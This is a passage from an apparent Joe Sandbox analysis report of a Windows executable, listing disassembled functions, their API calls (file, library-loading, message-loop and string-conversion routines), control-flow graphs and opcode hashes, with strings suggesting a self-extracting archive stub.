                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0073A7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                              • String ID: Fjuns$PNG
                                                                                              • API String ID: 541704414-78378848
                                                                                              • Opcode ID: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                              • Instruction ID: b9790c83e655af9c2992eb7ccce5535d8c2a56567fc3b7ae2ac967aab13bede4
                                                                                              • Opcode Fuzzy Hash: d8ae1a963484e62f0f4a2fba6429fa46cdab8108938f25bfd17f7b7788658cad
                                                                                              • Instruction Fuzzy Hash: AC31C172600B06BFE7119F31DC8DD5BBBB8EF847A1F044518F84682221EB79D8409AA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 913 74a95b-74a974 914 74a976-74a986 call 74ef4c 913->914 915 74a98a-74a98f 913->915 914->915 922 74a988 914->922 917 74a991-74a999 915->917 918 74a99c-74a9c0 MultiByteToWideChar 915->918 917->918 920 74a9c6-74a9d2 918->920 921 74ab53-74ab66 call 73fbbc 918->921 923 74a9d4-74a9e5 920->923 924 74aa26 920->924 922->915 928 74aa04-74aa15 call 748e06 923->928 929 74a9e7-74a9f6 call 752010 923->929 927 74aa28-74aa2a 924->927 931 74aa30-74aa43 MultiByteToWideChar 927->931 932 74ab48 927->932 928->932 939 74aa1b 928->939 929->932 938 74a9fc-74aa02 929->938 931->932 936 74aa49-74aa5b call 74af6c 931->936 937 74ab4a-74ab51 call 74abc3 932->937 943 74aa60-74aa64 936->943 937->921 942 74aa21-74aa24 938->942 939->942 942->927 943->932 945 74aa6a-74aa71 943->945 946 74aa73-74aa78 945->946 947 74aaab-74aab7 945->947 946->937 950 74aa7e-74aa80 946->950 948 74ab03 947->948 949 74aab9-74aaca 947->949 951 74ab05-74ab07 948->951 953 74aae5-74aaf6 call 748e06 949->953 954 74aacc-74aadb call 752010 949->954 950->932 952 74aa86-74aaa0 call 74af6c 950->952 955 74ab41-74ab47 call 74abc3 951->955 956 74ab09-74ab22 call 74af6c 951->956 952->937 966 74aaa6 952->966 953->955 969 74aaf8 953->969 954->955 968 74aadd-74aae3 954->968 955->932 956->955 970 74ab24-74ab2b 956->970 966->932 971 74aafe-74ab01 968->971 969->971 972 74ab67-74ab6d 970->972 973 74ab2d-74ab2e 970->973 971->951 974 74ab2f-74ab3f WideCharToMultiByte 972->974 973->974 974->955 975 74ab6f-74ab76 call 74abc3 974->975 975->937
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00745695,00745695,?,?,?,0074ABAC,00000001,00000001,2DE85006), ref: 0074A9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0074AA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0074AB35
                                                                                              • __freea.LIBCMT ref: 0074AB42
                                                                                                • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                              • __freea.LIBCMT ref: 0074AB4B
                                                                                              • __freea.LIBCMT ref: 0074AB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                              • Instruction ID: 7f37725bf5e6a976cc39e8797b82f27c825e60fc7df7d1e590850cfb0bd01f99
                                                                                              • Opcode Fuzzy Hash: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                              • Instruction Fuzzy Hash: 6251C2B2A90216BFDB258F64CC45EBFB7AAEB44750F158629FC04E6150EB7CDC40C692
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00743B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 978 743b72-743b7c 979 743bee-743bf1 978->979 980 743bf3 979->980 981 743b7e-743b8c 979->981 982 743bf5-743bf9 980->982 983 743b95-743bb1 LoadLibraryExW 981->983 984 743b8e-743b91 981->984 987 743bb3-743bbc GetLastError 983->987 988 743bfa-743c00 983->988 985 743b93 984->985 986 743c09-743c0b 984->986 990 743beb 985->990 986->982 991 743be6-743be9 987->991 992 743bbe-743bd3 call 746088 987->992 988->986 989 743c02-743c03 FreeLibrary 988->989 989->986 990->979 991->990 992->991 995 743bd5-743be4 LoadLibraryExW 992->995 995->988 995->991
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00743C35,?,?,00782088,00000000,?,00743D60,00000004,InitializeCriticalSectionEx,00756394,InitializeCriticalSectionEx,00000000), ref: 00743C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                              • Instruction ID: 66293837ffbdd4c5feff7a2beaadf5f5e1e23625a8acd709d41ff33465036034
                                                                                              • Opcode Fuzzy Hash: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                              • Instruction Fuzzy Hash: 0C110A71A44724ABDB228B589C41B997764EF017B1F214210E919FB1D0E778EF00C6D5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                                • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                              • OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                              • SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3To
                                                                                              • API String ID: 3498096277-2168385784
                                                                                              • Opcode ID: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                              • Instruction ID: e4302c4fcd413434adc3b52dea4dfb802fc5bf0eb7adf3e60b0f7d47a2ea3927
                                                                                              • Opcode Fuzzy Hash: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                              • Instruction Fuzzy Hash: 9EF06DB1D40249ABCB10AFA9D8499EFFFFCEF84B00F10411AE801E2241CBB856058FA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007298E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1000 7298e0-729901 call 73ec50 1003 729903-729906 1000->1003 1004 72990c 1000->1004 1003->1004 1005 729908-72990a 1003->1005 1006 72990e-72991f 1004->1006 1005->1006 1007 729921 1006->1007 1008 729927-729931 1006->1008 1007->1008 1009 729933 1008->1009 1010 729936-729943 call 726edb 1008->1010 1009->1010 1013 729945 1010->1013 1014 72994b-72996a CreateFileW 1010->1014 1013->1014 1015 7299bb-7299bf 1014->1015 1016 72996c-72998e GetLastError call 72bb03 1014->1016 1018 7299c3-7299c6 1015->1018 1020 7299c8-7299cd 1016->1020 1022 729990-7299b3 CreateFileW GetLastError 1016->1022 1018->1020 1021 7299d9-7299de 1018->1021 1020->1021 1023 7299cf 1020->1023 1024 7299e0-7299e3 1021->1024 1025 7299ff-729a10 1021->1025 1022->1018 1026 7299b5-7299b9 1022->1026 1023->1021 1024->1025 1027 7299e5-7299f9 SetFileTime 1024->1027 1028 729a12-729a2a call 730602 1025->1028 1029 729a2e-729a39 1025->1029 1026->1018 1027->1025 1028->1029
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00727760,?,00000005,?,00000011), ref: 0072995F
                                                                                              • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00727760,?,00000005,?), ref: 007299A2
                                                                                              • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                              • Instruction ID: 1b6f19a3c46cc2595d0c2fb992b1259eaab68bdd6ee7cbe26e97a77fe32fab3f
                                                                                              • Opcode Fuzzy Hash: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                              • Instruction Fuzzy Hash: 66314730544351AFE7309F20DC4ABDABB94BB84330F180B1DF6E5961D1D3B8A994CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1059 73b568-73b581 PeekMessageW 1060 73b583-73b597 GetMessageW 1059->1060 1061 73b5bc-73b5be 1059->1061 1062 73b599-73b5a6 IsDialogMessageW 1060->1062 1063 73b5a8-73b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                              • IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                              • TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                              • Instruction ID: 34fbeba6c67362867dedf975606f2b57194c11b039f836d05e6573a69e36e2ab
                                                                                              • Opcode Fuzzy Hash: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                              • Instruction Fuzzy Hash: 0CF0BD71A4121AABDB209BE5DC4CDDB7FACEE056917008515B905D2011EB7CD605CBB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1064 73abab-73abca GetClassNameW 1065 73abf2-73abf4 1064->1065 1066 73abcc-73abe1 call 731fbb 1064->1066 1068 73abf6-73abf9 SHAutoComplete 1065->1068 1069 73abff-73ac01 1065->1069 1071 73abe3-73abef FindWindowExW 1066->1071 1072 73abf1 1066->1072 1068->1069 1071->1072 1072->1065
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0073ABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0073ABF9
                                                                                                • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0073ABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                              • Instruction ID: 9e707f7cff5f428269232dc02ef85828e818e1deb724869cc846f144d02d6223
                                                                                              • Opcode Fuzzy Hash: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                              • Instruction Fuzzy Hash: E1F0277270122977EB2097289C0AFDBB36C9F46F00F488021BE40F30C0D768DE4186BA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1073 73dbde-73dc09 call 73ec50 SetEnvironmentVariableW call 730371 1077 73dc0e-73dc12 1073->1077 1078 73dc36-73dc38 1077->1078 1079 73dc14-73dc18 1077->1079 1080 73dc21-73dc28 call 73048d 1079->1080 1083 73dc1a-73dc20 1080->1083 1084 73dc2a-73dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                              • Instruction ID: b726a5121e318d18a7d4fbc02c77a2f00548c85d8a72c286d05db2476097d8c9
                                                                                              • Opcode Fuzzy Hash: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                              • Instruction Fuzzy Hash: FBF0A7B2414628AAEB201BA59C0ABFA3B58AF05B82F040415BD8595052E7FC8D40D6B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1085 729785-729791 1086 729793-72979b GetStdHandle 1085->1086 1087 72979e-7297b5 ReadFile 1085->1087 1086->1087 1088 729811 1087->1088 1089 7297b7-7297c0 call 7298bc 1087->1089 1090 729814-729817 1088->1090 1093 7297c2-7297ca 1089->1093 1094 7297d9-7297dd 1089->1094 1093->1094 1095 7297cc 1093->1095 1096 7297ee-7297f2 1094->1096 1097 7297df-7297e8 GetLastError 1094->1097 1098 7297cd-7297d7 call 729785 1095->1098 1100 7297f4-7297fc 1096->1100 1101 72980c-72980f 1096->1101 1097->1096 1099 7297ea-7297ec 1097->1099 1098->1090 1099->1090 1100->1101 1103 7297fe-729807 GetLastError 1100->1103 1101->1090 1103->1101 1105 729809-72980a 1103->1105 1105->1098
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00729795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007297AD
                                                                                              • GetLastError.KERNEL32 ref: 007297DF
                                                                                              • GetLastError.KERNEL32 ref: 007297FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                              • Instruction ID: 3a29b4a343e19ecfef2b72bef6ad6c8147ebf741f3b8c9e2e045e91557f53e9f
                                                                                              • Opcode Fuzzy Hash: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                              • Instruction Fuzzy Hash: FA11A130910324EBDF205F64E804AAA37A9FB42361F1C8929F75AC5290D7BCDE44DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00743F73,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue), ref: 0074AD66
                                                                                              • GetLastError.KERNEL32(?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000,00000364,?,007498B7), ref: 0074AD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000), ref: 0074AD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                              • Instruction ID: 59d2eaa357bbebc2975bd999039dde6b4b0319591fb33787e0ba8f78740fdf41
                                                                                              • Opcode Fuzzy Hash: 1124e875b517efe459e512336f7b2256bbaa54a9b37c506ad4a7c371ad2988e6
                                                                                              • Instruction Fuzzy Hash: F4014732B81322BBC7224A689C44A977B58EF057B3B214220F816D76A4D72CC801CEE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                                • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                                • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                                • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                                • Part of subcall function 0074BB4E: _abort.LIBCMT ref: 0074BB80
                                                                                                • Part of subcall function 0074BB4E: _free.LIBCMT ref: 0074BBB4
                                                                                                • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                              • _free.LIBCMT ref: 0074BA9F
                                                                                              • _free.LIBCMT ref: 0074BAD5
                                                                                              Strings
                                                                                              Memory Dump Source
